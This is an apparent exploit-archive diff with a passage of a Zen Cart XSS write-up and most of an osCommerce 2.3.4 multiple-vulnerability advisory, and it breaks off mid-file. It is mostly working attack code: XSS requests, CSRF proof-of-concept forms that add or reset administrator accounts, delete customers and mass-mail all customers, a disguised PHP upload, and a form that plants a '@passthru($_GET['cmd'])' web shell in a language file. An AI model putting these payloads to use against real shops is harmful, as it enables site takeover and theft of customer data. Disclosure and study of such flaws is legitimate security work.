||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">66%</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
(...)
|
||||
|
||||
|
||||
- Customers -> Group Pricing -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">1</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">0.00</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
664
platforms/php/webapps/34582.txt
Executable file
|
@ -0,0 +1,664 @@
|
|||
#Title: osCommerce 2.3.4 - Multiple vulnerabilities
|
||||
#Date: 10.07.14
|
||||
#Affected versions: => 2.3.4 (latest atm)
|
||||
#Vendor: oscommerce.com
|
||||
#Tested on: Apache 2.2.22 [at] Debian
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
#Cross Site Scripting
|
||||
|
||||
1. Reflected XSS -> Send Email
|
||||
|
||||
Vulnerable parameters - customers_email_address & mail_sent_to
|
||||
|
||||
a) POST
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
customers_email_address=<script>alert(666)</script>&from=fuck@shit.up&subject=test&message=test
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
(...)
|
||||
<td class="smallText"><strong>Customer:</strong><br /><script>alert(666)</script></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
CSRF PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview" method="POST">
|
||||
<input type="hidden" name="customers_email_address" value="<script>alert(666)</script>" />
|
||||
<input type="hidden" name="from" value="fuck@shit.up" />
|
||||
<input type="hidden" name="subject" value="test" />
|
||||
<input type="hidden" name="message" value="test" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
b) GET
|
||||
|
||||
Request:
|
||||
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="messageStackSuccess"><img src="images/icons/success.gif" border="0" alt="Success" title="Success" />&nbps;Notice: Email sent to: <script>alert(666)</script></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
2. Persistent XSS via CSRF -> Newsletter
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
module=newsletter&title=<script>alert(123)</script>&content=<script>alert(456)</script>
|
||||
|
||||
CSRF PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert" method="POST">
|
||||
<input type="hidden" name="module" value="newsletter" />
|
||||
<input type="hidden" name="title" value="<script>alert(123)</script>" />
|
||||
<input type="hidden" name="content" value="<script>alert(456)</script>" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
First popbox (123) will be executed whenever someone will visit newsletters page:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
|
||||
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbps;<script>alert(123)</script></td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><strong><script>alert(123)</script></strong></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Second one, will be executed whenever someone will visit specific newsletter page:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
|
||||
|
||||
(...)
|
||||
<tr>
|
||||
<td><tt><script>alert(456)</script></tt></td>
|
||||
</tr>
|
||||
<tr>
|
||||
(...)
|
||||
|
||||
3. Persistent XSS via CSRF -> Banner manager
|
||||
|
||||
Vulnerable parameter - banners_title
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
function go()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?action=insert", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19390593192018454503847724432");
|
||||
xhr.withCredentials = true;
|
||||
var body = "-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_title\"\r\n" +
|
||||
"\r\n" +
|
||||
"\x3cscript\x3ealert(666)\x3c/script\x3e\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_url\"\r\n" +
|
||||
"\r\n" +
|
||||
"url\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_group\"\r\n" +
|
||||
"\r\n" +
|
||||
"footer\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"new_banners_group\"\r\n" +
|
||||
"\r\n" +
|
||||
"group\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image\"; filename=\"info.gif\"\r\n" +
|
||||
"Content-Type: application/x-php\r\n" +
|
||||
"\r\n" +
|
||||
"\x3c?php\n" +
|
||||
"phpinfo();\n" +
|
||||
"?\x3e\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image_local\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image_target\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_html_text\"\r\n" +
|
||||
"\r\n" +
|
||||
"sup\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"date_scheduled\"\r\n" +
|
||||
"\r\n" +
|
||||
"2014-07-01\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"expires_date\"\r\n" +
|
||||
"\r\n" +
|
||||
"2014-07-31\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"expires_impressions\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Go" onclick="go();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visitd banner manager page or specific banner page.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
|
||||
|
||||
Response:
|
||||
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=3')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title="View Banner" /></a>&nbps;<script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">group</td>
|
||||
|
||||
|
||||
4. Persistent XSS via CSRF -> Locations / Taxes
|
||||
|
||||
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&action=insert" method="POST">
|
||||
<input type="hidden" name="countries_name" value="AAAA<script>alert(666)</script>" />
|
||||
<input type="hidden" name="countries_iso_code_2" value="xs" />
|
||||
<input type="hidden" name="countries_iso_code_3" value="sed" />
|
||||
<input type="hidden" name="address_format_id" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visitd 'countries' tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=241&action=edit'">
|
||||
<td class="dataTableContent">AAAA<script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="center" width="40">xs</td>
|
||||
<td class="dataTableContent" align="center" width="40">sed</td>
|
||||
(...)
|
||||
|
||||
5. Persistent XSS via CSRF -> Localization
|
||||
|
||||
a) Currencies
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&action=insert" method="POST">
|
||||
<input type="hidden" name="cs" value="" />
|
||||
<input type="hidden" name="title" value="<script>alert(666)</script>" />
|
||||
<input type="hidden" name="code" value="666" />
|
||||
<input type="hidden" name="symbol_left" value="hm" />
|
||||
<input type="hidden" name="symbol_right" value="mh" />
|
||||
<input type="hidden" name="decimal_point" value="10" />
|
||||
<input type="hidden" name="thousands_point" value="100" />
|
||||
<input type="hidden" name="decimal_places" value="10000" />
|
||||
<input type="hidden" name="value" value="666"><script>alert(123)</script>" />
|
||||
<input type="hidden" name="default" value="on" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visit currencies tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=3&action=edit'">
|
||||
<td class="dataTableContent"><strong><script>alert(666)</script> (default)</strong></td>
|
||||
<td class="dataTableContent">666</td>
|
||||
<td class="dataTableContent" align="right">666.00000000</td>
|
||||
(...)
|
||||
|
||||
b) Languages
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?action=insert" method="POST">
|
||||
<input type="hidden" name="name" value=""><script>alert(666)</script>" />
|
||||
<input type="hidden" name="code" value="h3ll" />
|
||||
<input type="hidden" name="image" value="icon.gif" />
|
||||
<input type="hidden" name="directory" value="asdf" />
|
||||
<input type="hidden" name="sort_order" value="asdf" />
|
||||
<input type="hidden" name="default" value="on" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visit langauges tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?page=1&lID=2&action=edit'">
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent">66</td>
|
||||
(...)
|
||||
|
||||
c) Orders status
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><strong>'>"><>XSS</strong></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt="<script>alert(666)</script>" title="<script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf'>"><>XSS/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english/images/icon.gif" border="0" alt="English" title="English" />&nbps;'>"><>XSS</td>
|
||||
</tr>
|
||||
|
||||
|
||||
|
||||
#Boring CSRF
|
||||
|
||||
- Remove any item from cart
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
|
||||
|
||||
- Add item to cart
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
|
||||
|
||||
- Remove address book entry
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
|
||||
|
||||
- Remove specific country
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
|
||||
|
||||
- Remove specific currency
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
|
||||
|
||||
- Change store credentials
|
||||
|
||||
I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
|
||||
|
||||
...and a lot more.
|
||||
|
||||
|
||||
|
||||
#Less boring CSRF
|
||||
|
||||
- Send email as admin -> Send email
|
||||
|
||||
It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=send_email_to_user" method="POST">
|
||||
<input type="hidden" name="customers_email_address" value="***" />
|
||||
<input type="hidden" name="from" value=""storeowner" <storemail@lol.lo>" />
|
||||
<input type="hidden" name="subject" value="subject" />
|
||||
<input type="hidden" name="message" value="sup" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
- Delete / Edit specific user
|
||||
|
||||
Remove user PoC:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
|
||||
|
||||
Edit user PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=update" method="POST">
|
||||
<input type="hidden" name="default_address_id" value="1" />
|
||||
<input type="hidden" name="customers_gender" value="m" />
|
||||
<input type="hidden" name="customers_firstname" value="juster" />
|
||||
<input type="hidden" name="customers_lastname" value="testing" />
|
||||
<input type="hidden" name="customers_dob" value="07/13/2004" />
|
||||
<input type="hidden" name="customers_email_address" value="szit@szit.szit" />
|
||||
<input type="hidden" name="entry_company" value="asdf" />
|
||||
<input type="hidden" name="entry_street_address" value="asdfasdf" />
|
||||
<input type="hidden" name="entry_suburb" value="asdfsdff" />
|
||||
<input type="hidden" name="entry_postcode" value="66-666" />
|
||||
<input type="hidden" name="entry_city" value="asdfasdf" />
|
||||
<input type="hidden" name="entry_state" value="asdfasdfasdf" />
|
||||
<input type="hidden" name="entry_country_id" value="5" />
|
||||
<input type="hidden" name="customers_telephone" value="123456792" />
|
||||
<input type="hidden" name="customers_fax" value="" />
|
||||
<input type="hidden" name="customers_newsletter" value="1" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
- Add / Edit / Delete admin
|
||||
|
||||
Add admin account:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?action=insert" method="POST">
|
||||
<input type="hidden" name="username" value="haxor" />
|
||||
<input type="hidden" name="password" value="pwned" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Change admin (set new password):
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=1&action=save" method="POST">
|
||||
<input type="hidden" name="username" value="admin" />
|
||||
<input type="hidden" name="password" value="newpass" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Remove admin:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
|
||||
|
||||
|
||||
- RCE via CSRF -> Define Languages
|
||||
|
||||
It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/define_language.php?lngdir=english&filename=english.php&action=save" method="POST">
|
||||
<input type="hidden" name="file_contents" value="<?php
|
||||
/*
|
||||
$Id$
|
||||
|
||||
osCommerce, Open Source E-Commerce Solutions
|
||||
http://www.oscommerce.com
|
||||
|
||||
Copyright (c) 2013 osCommerce
|
||||
|
||||
Released under the GNU General Public License
|
||||
*/
|
||||
|
||||
// look in your $PATH_LOCALE/locale directory for available locales
|
||||
// or type locale -a on the server.
|
||||
// Examples:
|
||||
// on RedHat try 'en_US'
|
||||
// on FreeBSD try 'en_US.ISO_8859-1'
|
||||
// on Windows try 'en', or 'English'
|
||||
@setlocale(LC_ALL, array('en_US.UTF-8', 'en_US.UTF8', 'enu_usa'));
|
||||
|
||||
define('DATE_FORMAT_SHORT', '%m/%d/%Y'); // this is used for strftime()
|
||||
define('DATE_FORMAT_LONG', '%A %d %B, %Y'); // this is used for strftime()
|
||||
define('DATE_FORMAT', 'm/d/Y'); // this is used for date()
|
||||
define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');
|
||||
define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization
|
||||
define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate
|
||||
|
||||
@passthru($_GET['cmd']);
|
||||
|
||||
////
|
||||
// Return date in raw format
|
||||
// $date should be in format mm/dd/yyyy
|
||||
// raw date is in format YYYYMMDD, or DDMMYYYY
|
||||
function tep_date_raw($date, $reverse = false) {
|
||||
if ($reverse) {
|
||||
return substr($date, 3, 2) . substr($date, 0, 2) . substr($date, 6, 4);
|
||||
} else {
|
||||
return substr($date, 6, 4) . substr($date, 0, 2) . substr($date, 3, 2);
|
||||
}
|
||||
}
|
||||
|
||||
// if USE_DEFAULT_LANGUAGE_CURRENCY is true, use the following currency, instead of the applications default currency (used when changing language)
|
||||
define('LANGUAGE_CURRENCY', 'USD');
|
||||
|
||||
// Global entries for the <html> tag
|
||||
define('HTML_PARAMS', 'dir="ltr" lang="en"');
|
||||
|
||||
// charset for web pages and emails
|
||||
define('CHARSET', 'utf-8');
|
||||
|
||||
// page title
|
||||
define('TITLE', STORE_NAME);
|
||||
|
||||
// header text in includes/header.php
|
||||
define('HEADER_TITLE_CREATE_ACCOUNT', 'Create an Account');
|
||||
define('HEADER_TITLE_MY_ACCOUNT', 'My Account');
|
||||
define('HEADER_TITLE_CART_CONTENTS', 'Cart Contents');
|
||||
define('HEADER_TITLE_CHECKOUT', 'Checkout');
|
||||
define('HEADER_TITLE_TOP', 'Top');
|
||||
define('HEADER_TITLE_CATALOG', 'Catalog');
|
||||
define('HEADER_TITLE_LOGOFF', 'Log Off');
|
||||
define('HEADER_TITLE_LOGIN', 'Log In');
|
||||
|
||||
// footer text in includes/footer.php
|
||||
define('FOOTER_TEXT_REQUESTS_SINCE', 'requests since');
|
||||
|
||||
// text for gender
|
||||
define('MALE', 'Male');
|
||||
define('FEMALE', 'Female');
|
||||
define('MALE_ADDRESS', 'Mr.');
|
||||
define('FEMALE_ADDRESS', 'Ms.');
|
||||
|
||||
// text for date of birth example
|
||||
define('DOB_FORMAT_STRING', 'mm/dd/yyyy');
|
||||
|
||||
// checkout procedure text
|
||||
define('CHECKOUT_BAR_DELIVERY', 'Delivery Information');
|
||||
define('CHECKOUT_BAR_PAYMENT', 'Payment Information');
|
||||
define('CHECKOUT_BAR_CONFIRMATION', 'Confirmation');
|
||||
define('CHECKOUT_BAR_FINISHED', 'Finished!');
|
||||
|
||||
// pull down default text
|
||||
define('PULL_DOWN_DEFAULT', 'Please Select');
|
||||
define('TYPE_BELOW', 'Type Below');
|
||||
|
||||
// javascript messages
|
||||
define('JS_ERROR', 'Errors have occured during the process of your form.\n\nPlease make the following corrections:\n\n');
|
||||
|
||||
define('JS_REVIEW_TEXT', '* The \'Review Text\' must have at least ' . REVIEW_TEXT_MIN_LENGTH . ' characters.\n');
|
||||
define('JS_REVIEW_RATING', '* You must rate the product for your review.\n');
|
||||
|
||||
define('JS_ERROR_NO_PAYMENT_MODULE_SELECTED', '* Please select a payment method for your order.\n');
|
||||
|
||||
define('JS_ERROR_SUBMITTED', 'This form has already been submitted. Please press Ok and wait for this process to be completed.');
|
||||
|
||||
define('ERROR_NO_PAYMENT_MODULE_SELECTED', 'Please select a payment method for your order.');
|
||||
|
||||
define('CATEGORY_COMPANY', 'Company Details');
|
||||
define('CATEGORY_PERSONAL', 'Your Personal Details');
|
||||
define('CATEGORY_ADDRESS', 'Your Address');
|
||||
define('CATEGORY_CONTACT', 'Your Contact Information');
|
||||
define('CATEGORY_OPTIONS', 'Options');
|
||||
define('CATEGORY_PASSWORD', 'Your Password');
|
||||
|
||||
define('ENTRY_COMPANY', 'Company Name:');
|
||||
define('ENTRY_COMPANY_TEXT', '');
|
||||
define('ENTRY_GENDER', 'Gender:');
|
||||
define('ENTRY_GENDER_ERROR', 'Please select your Gender.');
|
||||
define('ENTRY_GENDER_TEXT', '*');
|
||||
define('ENTRY_FIRST_NAME', 'First Name:');
|
||||
define('ENTRY_FIRST_NAME_ERROR', 'Your First Name must contain a minimum of ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_FIRST_NAME_TEXT', '*');
|
||||
define('ENTRY_LAST_NAME', 'Last Name:');
|
||||
define('ENTRY_LAST_NAME_ERROR', 'Your Last Name must contain a minimum of ' . ENTRY_LAST_NAME_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_LAST_NAME_TEXT', '*');
|
||||
define('ENTRY_DATE_OF_BIRTH', 'Date of Birth:');
|
||||
define('ENTRY_DATE_OF_BIRTH_ERROR', 'Your Date of Birth must be in this format: MM/DD/YYYY (eg 05/21/1970)');
|
||||
define('ENTRY_DATE_OF_BIRTH_TEXT', '* (eg. 05/21/1970)');
|
||||
define('ENTRY_EMAIL_ADDRESS', 'E-Mail Address:');
|
||||
define('ENTRY_EMAIL_ADDRESS_ERROR', 'Your E-Mail Address must contain a minimum of ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', 'Your E-Mail Address does not appear to be valid - please make any necessary corrections.');
|
||||
define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', 'Your E-Mail Address already exists in our records - please log in with the e-mail address or create an account with a different address.');
|
||||
define('ENTRY_EMAIL_ADDRESS_TEXT', '*');
|
||||
define('ENTRY_STREET_ADDRESS', 'Street Address:');
|
||||
define('ENTRY_STREET_ADDRESS_ERROR', 'Your Street Address must contain a minimum of ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_STREET_ADDRESS_TEXT', '*');
|
||||
define('ENTRY_SUBURB', 'Suburb:');
|
||||
define('ENTRY_SUBURB_TEXT', '');
|
||||
define('ENTRY_POST_CODE', 'Post Code:');
|
||||
define('ENTRY_POST_CODE_ERROR', 'Your Post Code must contain a minimum of ' . ENTRY_POSTCODE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_POST_CODE_TEXT', '*');
|
||||
define('ENTRY_CITY', 'City:');
|
||||
define('ENTRY_CITY_ERROR', 'Your City must contain a minimum of ' . ENTRY_CITY_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_CITY_TEXT', '*');
|
||||
define('ENTRY_STATE', 'State/Province:');
|
||||
define('ENTRY_STATE_ERROR', 'Your State must contain a minimum of ' . ENTRY_STATE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_STATE_ERROR_SELECT', 'Please select a state from the States pull down menu.');
|
||||
define('ENTRY_STATE_TEXT', '*');
|
||||
define('ENTRY_COUNTRY', 'Country:');
|
||||
define('ENTRY_COUNTRY_ERROR', 'You must select a country from the Countries pull down menu.');
|
||||
define('ENTRY_COUNTRY_TEXT', '*');
|
||||
define('ENTRY_TELEPHONE_NUMBER', 'Telephone Number:');
|
||||
define('ENTRY_TELEPHONE_NUMBER_ERROR', 'Your Telephone Number must contain a minimum of ' . ENTRY_TELEPHONE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_TELEPHONE_NUMBER_TEXT', '*');
|
||||
define('ENTRY_FAX_NUMBER', 'Fax Number:');
|
||||
define('ENTRY_FAX_NUMBER_TEXT', '');
|
||||
define('ENTRY_NEWSLETTER', 'Newsletter:');
|
||||
define('ENTRY_NEWSLETTER_TEXT', '');
|
||||
define('ENTRY_NEWSLETTER_YES', 'Subscribed');
|
||||
define('ENTRY_NEWSLETTER_NO', 'Unsubscribed');
|
||||
define('ENTRY_PASSWORD', 'Password:');
|
||||
define('ENTRY_PASSWORD_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_PASSWORD_ERROR_NOT_MATCHING', 'The Password Confirmation must match your Password.');
|
||||
define('ENTRY_PASSWORD_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CONFIRMATION', 'Password Confirmation:');
|
||||
define('ENTRY_PASSWORD_CONFIRMATION_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CURRENT', 'Current Password:');
|
||||
define('ENTRY_PASSWORD_CURRENT_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CURRENT_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
